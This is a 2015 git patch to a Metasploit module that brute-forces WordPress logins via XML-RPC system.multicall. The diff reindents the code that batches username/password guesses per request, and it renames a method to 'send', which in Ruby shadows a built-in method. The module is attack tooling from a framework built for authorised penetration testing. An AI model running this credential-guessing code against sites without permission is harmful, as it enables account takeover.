From 732563614b5044048d69db6a9e2e22b03ffa556a Mon Sep 17 00:00:00 2001 From: KINGSABRI Date: Thu, 12 Nov 2015 20:26:17 +0300 Subject: [PATCH] Change connecting method to send for better code naming --- .../wordpress_xmlrpc_massive_bruteforce.rb | 88 +++++++++---------- 1 file changed, 44 insertions(+), 44 deletions(-) diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb index 067cce048a..f4e4c31458 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb @@ -16,26 +16,26 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{Wordpress Massive Burteforce attacks via wordpress XMLRPC service.}, 'License' => MSF_LICENSE, 'Author' => - [ - 'Sabri (@KINGSABRI)', # Module Writer - 'William (WCoppola@Lares.com)' # Module Requester - ], + [ + 'Sabri (@KINGSABRI)', # Module Writer + 'William (WCoppola@Lares.com)' # Module Requester + ], 'References' => - [ - ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'], - ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html'] - ] + [ + ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'], + ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html'] + ] )) register_options( - [ - OptString.new('TARGETURI', [true, 'The base path', '/']), - OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line', - File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]), - OptPath.new('WPPASS_FILE', [true, 'File containing passwords, one per line', - File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")]), - OptInt.new('BLOCKEDWAIT', [true, 'Time(minutes) to wait if got blocked', 6]) - ], self.class) + [ + OptString.new('TARGETURI', [true, 'The base path', '/']), + OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line', + File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]), + OptPath.new('WPPASS_FILE', [true, 'File containing passwords, one per line', + File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")]), + OptInt.new('BLOCKEDWAIT', [true, 'Time(minutes) to wait if got blocked', 6]) + ], self.class) end def usernames @@ -60,31 +60,31 @@ class Metasploit3 < Msf::Auxiliary xml.methodCall { xml.methodName("system.multicall") xml.params { - xml.param { - xml.value { - xml.array { - xml.data { + xml.param { + xml.value { + xml.array { + xml.data { - pass_group.each do |pass| - xml.value { - xml.struct { - xml.member { - xml.name("methodName") - xml.value { xml.string("wp.getUsersBlogs") }} - xml.member { - xml.name("params") - xml.value { - xml.array { - xml.data { - xml.value { - xml.array { - xml.data { - xml.value { xml.string(user) } - xml.value { xml.string(pass) } - }}}}}}}}} - end + pass_group.each do |pass| + xml.value { + xml.struct { + xml.member { + xml.name("methodName") + xml.value { xml.string("wp.getUsersBlogs") }} + xml.member { + xml.name("params") + xml.value { + xml.array { + xml.data { + xml.value { + xml.array { + xml.data { + xml.value { xml.string(user) } + xml.value { xml.string(pass) } + }}}}}}}}} + end - }}}}}} + }}}}}} end xml_payloads << document.to_xml @@ -116,8 +116,8 @@ class Metasploit3 < Msf::Auxiliary # # Connection Setup # - def connecting(xml) - uri = target_uri.path + def send(xml) + uri = target_uri.path opts = { 'method' => 'POST', @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary generate_xml(user).each do |xml| next if passfound == true - connecting(xml) + send(xml) # Request Parser req_xml = Nokogiri::Slop xml @@ -174,5 +174,5 @@ class Metasploit3 < Msf::Auxiliary sleep 2 end - end end end -end + end end end +end \ No newline at end of file